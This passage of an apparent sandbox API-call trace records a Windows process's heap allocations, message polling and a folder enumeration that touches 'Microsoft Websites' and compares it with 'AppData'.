hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b420 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0074.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3f0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b208 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.189] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0074.189] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.190] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.190] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.190] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0074.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.191] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0074.191] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b20 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.191] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.191] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b20 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0074.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c30 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b300 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0074.192] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0074.192] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c50 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.192] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.192] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.192] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.192] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0074.193] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ad0 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft Websites", cchCount1=18, lpString2="AppData", cchCount2=7) returned 3 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.193] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0074.193] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cf0 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.193] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b20 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.194] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0074.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.194] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e58 | out: hHeap=0x650000) returned 1 [0074.194] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0074.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690ac0 [0074.194] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bc0 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690bd0 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c10 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690b20 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690c50 [0074.195] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b10 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ce0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.196] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.196] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.196] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b10 | out: hHeap=0x650000) returned 1 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b2e8 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b438 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b10 [0074.196] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b438 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3f0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3d8 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cf0 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0074.196] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.196] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ad0 [0074.197] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ca0 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3a8 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0074.197] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b420 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690d00 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b408 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b450 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b468 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c60 [0074.197] RtlAllocateHeap (HeapHandle=0x650000, 